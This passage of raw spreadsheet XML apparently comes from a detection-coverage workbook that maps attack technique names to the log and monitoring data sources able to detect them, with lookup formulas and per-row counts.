        <v>45</v>
      </c>
      <c r="D530" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E530" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G530" s="53" t="str">
        <f>VLOOKUP(A530,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="531" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A531" s="55" t="s">
        <v>2851</v>
      </c>
      <c r="B531" s="17" t="str">
        <f>LOOKUP(A531,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C531" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D531" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E531" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G531" s="53" t="str">
        <f>VLOOKUP(A531,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="532" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A532" s="55" t="s">
        <v>2855</v>
      </c>
      <c r="B532" s="17" t="str">
        <f>LOOKUP(A532,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C532" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D532" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E532" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G532" s="53" t="str">
        <f>VLOOKUP(A532,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="533" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A533" s="55" t="s">
        <v>2860</v>
      </c>
      <c r="B533" s="17" t="str">
        <f>LOOKUP(A533,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C533" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D533" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E533" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G533" s="53" t="str">
        <f>VLOOKUP(A533,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="534" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A534" s="55" t="s">
        <v>2864</v>
      </c>
      <c r="B534" s="17" t="str">
        <f>LOOKUP(A534,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C534" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D534" s="17">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E534" s="17">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G534" s="53" t="str">
        <f>VLOOKUP(A534,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="535" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A535" s="55" t="s">
        <v>2869</v>
      </c>
      <c r="B535" s="53" t="str">
        <f>LOOKUP(A535,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C535" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D535" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E535" s="53">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G535" s="53" t="str">
        <f>VLOOKUP(A535,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="536" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A536" s="55" t="s">
        <v>2874</v>
      </c>
      <c r="B536" s="53" t="str">
        <f>LOOKUP(A536,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C536" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D536" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E536" s="53">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G536" s="53" t="str">
        <f>VLOOKUP(A536,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="537" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A537" s="55" t="s">
        <v>2878</v>
      </c>
      <c r="B537" s="53" t="str">
        <f>LOOKUP(A537,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C537" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D537" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E537" s="53">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G537" s="53" t="str">
        <f>VLOOKUP(A537,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="538" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A538" s="53" t="s">
        <v>2445</v>
      </c>
      <c r="B538" s="53" t="str">
        <f>LOOKUP(A538,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</v>
      </c>
      <c r="C538" s="53"/>
      <c r="D538" s="53">
        <f t="shared" si="17"/>
        <v>6</v>
      </c>
      <c r="E538" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G538" s="53" t="str">
        <f>VLOOKUP(A538,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration to Code Repository</v>
      </c>
    </row>
    <row r="539" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A539" s="53" t="s">
        <v>2449</v>
      </c>
      <c r="B539" s="53" t="str">
        <f>LOOKUP(A539,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</v>
      </c>
      <c r="C539" s="53"/>
      <c r="D539" s="53">
        <f t="shared" si="17"/>
        <v>6</v>
      </c>
      <c r="E539" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G539" s="53" t="str">
        <f>VLOOKUP(A539,'REF-DataSources'!A:B,2)</f>
        <v>Exfiltration to Cloud Storage</v>
      </c>
    </row>
    <row r="540" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A540" s="53" t="s">
        <v>2453</v>
      </c>
      <c r="B540" s="53" t="str">
        <f>LOOKUP(A540,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,DNS records</v>
      </c>
      <c r="C540" s="53"/>
      <c r="D540" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E540" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G540" s="53" t="str">
        <f>VLOOKUP(A540,'REF-DataSources'!A:B,2)</f>
        <v>Dynamic Resolution</v>
      </c>
    </row>
    <row r="541" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A541" s="55" t="s">
        <v>2458</v>
      </c>
      <c r="B541" s="53" t="str">
        <f>LOOKUP(A541,'REF-DataSources'!A:C)</f>
        <v>DNS records</v>
      </c>
      <c r="C541" s="53">
        <v>100</v>
      </c>
      <c r="D541" s="53">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="E541" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G541" s="53" t="str">
        <f>VLOOKUP(A541,'REF-DataSources'!A:B,2)</f>
        <v>Fast Flux DNS</v>
      </c>
    </row>
    <row r="542" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A542" s="53" t="s">
        <v>2463</v>
      </c>
      <c r="B542" s="53" t="str">
        <f>LOOKUP(A542,'REF-DataSources'!A:C)</f>
        <v>DNS records,Netflow/Enclave netflow,Network device logs,Packet capture,Process use of network</v>
      </c>
      <c r="C542" s="53"/>
      <c r="D542" s="53">
        <f t="shared" si="17"/>
        <v>5</v>
      </c>
      <c r="E542" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G542" s="53" t="str">
        <f>VLOOKUP(A542,'REF-DataSources'!A:B,2)</f>
        <v>Domain Generation Algorithms</v>
      </c>
    </row>
    <row r="543" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A543" s="55" t="s">
        <v>2468</v>
      </c>
      <c r="B543" s="53" t="str">
        <f>LOOKUP(A543,'REF-DataSources'!A:C)</f>
        <v>DNS records</v>
      </c>
      <c r="C543" s="53">
        <v>100</v>
      </c>
      <c r="D543" s="53">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="E543" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G543" s="53" t="str">
        <f>VLOOKUP(A543,'REF-DataSources'!A:B,2)</f>
        <v>DNS Calculation</v>
      </c>
    </row>
    <row r="544" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A544" s="53" t="s">
        <v>2472</v>
      </c>
      <c r="B544" s="53" t="str">
        <f>LOOKUP(A544,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C544" s="53"/>
      <c r="D544" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E544" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G544" s="53" t="str">
        <f>VLOOKUP(A544,'REF-DataSources'!A:B,2)</f>
        <v>System Services</v>
      </c>
    </row>
    <row r="545" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A545" s="53" t="s">
        <v>2477</v>
      </c>
      <c r="B545" s="53" t="str">
        <f>LOOKUP(A545,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C545" s="53"/>
      <c r="D545" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E545" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G545" s="53" t="str">
        <f>VLOOKUP(A545,'REF-DataSources'!A:B,2)</f>
        <v>Launchctl</v>
      </c>
    </row>
    <row r="546" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A546" s="53" t="s">
        <v>2481</v>
      </c>
      <c r="B546" s="53" t="str">
        <f>LOOKUP(A546,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C546" s="53"/>
      <c r="D546" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E546" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G546" s="53" t="str">
        <f>VLOOKUP(A546,'REF-DataSources'!A:B,2)</f>
        <v>Service Execution</v>
      </c>
    </row>
    <row r="547" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A547" s="53" t="s">
        <v>2485</v>
      </c>
      <c r="B547" s="53" t="str">
        <f>LOOKUP(A547,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Packet capture,Process use of network,Netflow/Enclave netflow,Network protocol analysis,Process monitoring</v>
      </c>
      <c r="C547" s="53"/>
      <c r="D547" s="53">
        <f t="shared" si="17"/>
        <v>7</v>
      </c>
      <c r="E547" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G547" s="53" t="str">
        <f>VLOOKUP(A547,'REF-DataSources'!A:B,2)</f>
        <v>Lateral Tool Transfer</v>
      </c>
    </row>
    <row r="548" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A548" s="53" t="s">
        <v>2489</v>
      </c>
      <c r="B548" s="53" t="str">
        <f>LOOKUP(A548,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C548" s="53"/>
      <c r="D548" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E548" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G548" s="53" t="str">
        <f>VLOOKUP(A548,'REF-DataSources'!A:B,2)</f>
        <v>Non-Standard Port</v>
      </c>
    </row>
    <row r="549" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A549" s="53" t="s">
        <v>2494</v>
      </c>
      <c r="B549" s="53" t="str">
        <f>LOOKUP(A549,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C549" s="53"/>
      <c r="D549" s="53">
        <f t="shared" si="17"/>
        <v>5</v>
      </c>
      <c r="E549" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G549" s="53" t="str">
        <f>VLOOKUP(A549,'REF-DataSources'!A:B,2)</f>
        <v>Protocol Tunneling</v>
      </c>
    </row>
    <row r="550" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A550" s="53" t="s">
        <v>2498</v>
      </c>
      <c r="B550" s="53" t="str">
        <f>LOOKUP(A550,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C550" s="53"/>
      <c r="D550" s="53">
        <f t="shared" si="17"/>
        <v>6</v>
      </c>
      <c r="E550" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G550" s="53" t="str">
        <f>VLOOKUP(A550,'REF-DataSources'!A:B,2)</f>
        <v>Encrypted Channel</v>
      </c>
    </row>
    <row r="551" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A551" s="53" t="s">
        <v>2503</v>
      </c>
      <c r="B551" s="53" t="str">
        <f>LOOKUP(A551,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C551" s="53"/>
      <c r="D551" s="53">
        <f t="shared" si="17"/>
        <v>6</v>
      </c>
      <c r="E551" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G551" s="53" t="str">
        <f>VLOOKUP(A551,'REF-DataSources'!A:B,2)</f>
        <v>Symmetric Cryptography</v>
      </c>
    </row>
    <row r="552" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A552" s="53" t="s">
        <v>2507</v>
      </c>
      <c r="B552" s="53" t="str">
        <f>LOOKUP(A552,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C552" s="53"/>
      <c r="D552" s="53">
        <f t="shared" si="17"/>
        <v>5</v>
      </c>
      <c r="E552" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G552" s="53" t="str">
        <f>VLOOKUP(A552,'REF-DataSources'!A:B,2)</f>
        <v>Asymmetric Cryptography</v>
      </c>
    </row>
    <row r="553" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A553" s="53" t="s">
        <v>2511</v>
      </c>
      <c r="B553" s="53" t="str">
        <f>LOOKUP(A553,'REF-DataSources'!A:C)</f>
        <v>Environment variable,Loaded DLLs,Process command-line parameters,Process monitoring,File monitoring,DLL monitoring</v>
      </c>
      <c r="C553" s="53"/>
      <c r="D553" s="53">
        <f t="shared" si="17"/>
        <v>6</v>
      </c>
      <c r="E553" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G553" s="53" t="str">
        <f>VLOOKUP(A553,'REF-DataSources'!A:B,2)</f>
        <v>Hijack Execution Flow</v>
      </c>
    </row>
    <row r="554" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A554" s="53" t="s">
        <v>2517</v>
      </c>
      <c r="B554" s="53" t="str">
        <f>LOOKUP(A554,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,DLL monitoring,File monitoring</v>
      </c>
      <c r="C554" s="53"/>
      <c r="D554" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E554" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G554" s="53" t="str">
        <f>VLOOKUP(A554,'REF-DataSources'!A:B,2)</f>
        <v>DLL Search Order Hijacking</v>
      </c>
    </row>
    <row r="555" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A555" s="53" t="s">
        <v>2522</v>
      </c>
      <c r="B555" s="53" t="str">
        <f>LOOKUP(A555,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Process use of network</v>
      </c>
      <c r="C555" s="53"/>
      <c r="D555" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E555" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G555" s="53" t="str">
        <f>VLOOKUP(A555,'REF-DataSources'!A:B,2)</f>
        <v>DLL Side-Loading</v>
      </c>
    </row>
    <row r="556" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A556" s="55" t="s">
        <v>2527</v>
      </c>
      <c r="B556" s="53" t="str">
        <f>LOOKUP(A556,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C556" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D556" s="53">
        <f t="shared" si="17"/>
        <v>2</v>
      </c>
      <c r="E556" s="53">
        <f t="shared" si="18"/>
        <v>2</v>
      </c>
      <c r="G556" s="53" t="str">
        <f>VLOOKUP(A556,'REF-DataSources'!A:B,2)</f>
        <v>Dylib Hijacking</v>
      </c>
    </row>
    <row r="557" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A557" s="53" t="s">
        <v>2531</v>
      </c>
      <c r="B557" s="53" t="str">
        <f>LOOKUP(A557,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring</v>
      </c>
      <c r="C557" s="53"/>
      <c r="D557" s="53">
        <f t="shared" si="17"/>
        <v>2</v>
      </c>
      <c r="E557" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G557" s="53" t="str">
        <f>VLOOKUP(A557,'REF-DataSources'!A:B,2)</f>
        <v>Executable Installer File Permissions Weakness</v>
      </c>
    </row>
    <row r="558" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A558" s="53" t="s">
        <v>2535</v>
      </c>
      <c r="B558" s="53" t="str">
        <f>LOOKUP(A558,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Environment variable</v>
      </c>
      <c r="C558" s="53"/>
      <c r="D558" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E558" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G558" s="53" t="str">
        <f>VLOOKUP(A558,'REF-DataSources'!A:B,2)</f>
        <v>LD_PRELOAD</v>
      </c>
    </row>
    <row r="559" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A559" s="55" t="s">
        <v>2540</v>
      </c>
      <c r="B559" s="53" t="str">
        <f>LOOKUP(A559,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C559" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D559" s="53">
        <f t="shared" si="17"/>
        <v>2</v>
      </c>
      <c r="E559" s="53">
        <f t="shared" si="18"/>
        <v>2</v>
      </c>
      <c r="G559" s="53" t="str">
        <f>VLOOKUP(A559,'REF-DataSources'!A:B,2)</f>
        <v>Path Interception by PATH Environment Variable</v>
      </c>
    </row>
    <row r="560" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A560" s="55" t="s">
        <v>2544</v>
      </c>
      <c r="B560" s="53" t="str">
        <f>LOOKUP(A560,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C560" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D560" s="53">
        <f t="shared" si="17"/>
        <v>2</v>
      </c>
      <c r="E560" s="53">
        <f t="shared" si="18"/>
        <v>2</v>
      </c>
      <c r="G560" s="53" t="str">
        <f>VLOOKUP(A560,'REF-DataSources'!A:B,2)</f>
        <v>Path Interception by Search Order Hijacking</v>
      </c>
    </row>
    <row r="561" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A561" s="55" t="s">
        <v>2548</v>
      </c>
      <c r="B561" s="53" t="str">
        <f>LOOKUP(A561,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C561" s="53" t="s">
        <v>126</v>
      </c>
      <c r="D561" s="53">
        <f t="shared" si="17"/>
        <v>2</v>
      </c>
      <c r="E561" s="53">
        <f t="shared" si="18"/>
        <v>2</v>
      </c>
      <c r="G561" s="53" t="str">
        <f>VLOOKUP(A561,'REF-DataSources'!A:B,2)</f>
        <v>Path Interception by Unquoted Path</v>
      </c>
    </row>
    <row r="562" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A562" s="53" t="s">
        <v>2551</v>
      </c>
      <c r="B562" s="53" t="str">
        <f>LOOKUP(A562,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Services,File monitoring</v>
      </c>
      <c r="C562" s="53"/>
      <c r="D562" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E562" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G562" s="53" t="str">
        <f>VLOOKUP(A562,'REF-DataSources'!A:B,2)</f>
        <v>Services File Permissions Weakness</v>
      </c>
    </row>
    <row r="563" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A563" s="53" t="s">
        <v>2556</v>
      </c>
      <c r="B563" s="53" t="str">
        <f>LOOKUP(A563,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Process command-line parameters</v>
      </c>
      <c r="C563" s="53"/>
      <c r="D563" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E563" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G563" s="53" t="str">
        <f>VLOOKUP(A563,'REF-DataSources'!A:B,2)</f>
        <v>Services Registry Permissions Weakness</v>
      </c>
    </row>
    <row r="564" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A564" s="53" t="s">
        <v>2561</v>
      </c>
      <c r="B564" s="53" t="str">
        <f>LOOKUP(A564,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C564" s="53"/>
      <c r="D564" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E564" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
      <c r="G564" s="53" t="str">
        <f>VLOOKUP(A564,'REF-DataSources'!A:B,2)</f>
        <v>COR_PROFILER</v>
      </c>
    </row>
    <row r="565" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A565" s="53" t="s">
        <v>2566</v>
      </c>
      <c r="B565" s="53" t="str">
        <f>LOOKUP(A565,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C565" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D565" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E565" s="53">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G565" s="53" t="str">
        <f>VLOOKUP(A565,'REF-DataSources'!A:B,2)</f>
        <v>Modify Cloud Compute Infrastructure</v>
      </c>
    </row>
    <row r="566" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A566" s="55" t="s">
        <v>2570</v>
      </c>
      <c r="B566" s="53" t="str">
        <f>LOOKUP(A566,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C566" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D566" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E566" s="53">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G566" s="53" t="str">
        <f>VLOOKUP(A566,'REF-DataSources'!A:B,2)</f>
        <v>Create Snapshot</v>
      </c>
    </row>
    <row r="567" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A567" s="55" t="s">
        <v>2575</v>
      </c>
      <c r="B567" s="53" t="str">
        <f>LOOKUP(A567,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C567" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D567" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E567" s="53">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G567" s="53" t="str">
        <f>VLOOKUP(A567,'REF-DataSources'!A:B,2)</f>
        <v>Create Cloud Instance</v>
      </c>
    </row>
    <row r="568" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A568" s="55" t="s">
        <v>2579</v>
      </c>
      <c r="B568" s="53" t="str">
        <f>LOOKUP(A568,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C568" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D568" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E568" s="53">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G568" s="53" t="str">
        <f>VLOOKUP(A568,'REF-DataSources'!A:B,2)</f>
        <v>Delete Cloud Instance</v>
      </c>
    </row>
    <row r="569" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A569" s="55" t="s">
        <v>2583</v>
      </c>
      <c r="B569" s="53" t="str">
        <f>LOOKUP(A569,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C569" s="53" t="s">
        <v>45</v>
      </c>
      <c r="D569" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E569" s="53">
        <f t="shared" si="18"/>
        <v>4</v>
      </c>
      <c r="G569" s="53" t="str">
        <f>VLOOKUP(A569,'REF-DataSources'!A:B,2)</f>
        <v>Revert Cloud Instance</v>
      </c>
    </row>
    <row r="570" spans="1:7" x14ac:dyDescent="0.2">
      <c r="G570" s="53"/>
    </row>
  </sheetData>
  <phoneticPr fontId="0" type="noConversion"/>
  <conditionalFormatting sqref="G2:G570">
    <cfRule type="iconSet" priority="1">
      <iconSet iconSet="3Symbols2" reverse="1">
        <cfvo type="percent" val="0"/>
        <cfvo type="num" val="0" gte="0"/>
        <cfvo type="num" val="0" gte="0"/>
      </iconSet>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9"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79ED3-26CD-DA4B-8E4F-144D2459E3ED}">
  <dimension ref="A1:V267"/>
  <sheetViews>
    <sheetView topLeftCell="A233" zoomScale="140" zoomScaleNormal="140" workbookViewId="0">
      <selection activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="16.1640625" style="4" customWidth="1"/>
    <col min="2" max="2" width="124.83203125" style="4" customWidth="1"/>
    <col min="3" max="3" width="21" style="5" customWidth="1"/>
    <col min="4" max="4" width="15.6640625" style="4" customWidth="1"/>
    <col min="5" max="6" width="11.1640625" style="4" customWidth="1"/>
    <col min="7" max="7" width="47.6640625" style="12" customWidth="1"/>
    <col min="8" max="22" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="28" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="28" t="s">
        <v>38</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>39</v>
      </c>
      <c r="D1" s="28" t="s">
        <v>40</v>
      </c>
      <c r="E1" s="28" t="s">
        <v>41</v>
      </c>
      <c r="F1" s="28" t="s">
        <v>42</v>
      </c>
      <c r="G1" s="28" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="2" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A2" s="16" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="53" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C2" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D2" s="53">
        <f>LEN(TRIM(B2))-LEN(SUBSTITUTE(TRIM(B2),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E2" s="53">
        <f t="shared" ref="E2:E8" si="0">LEN(TRIM(C2))-LEN(SUBSTITUTE(TRIM(C2),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F2" s="18"/>
      <c r="G2" s="53">
        <f>SUM(COUNTA('REF-DataSources'!A:A)-COUNTA(A:A))</f>
        <v>302</v>
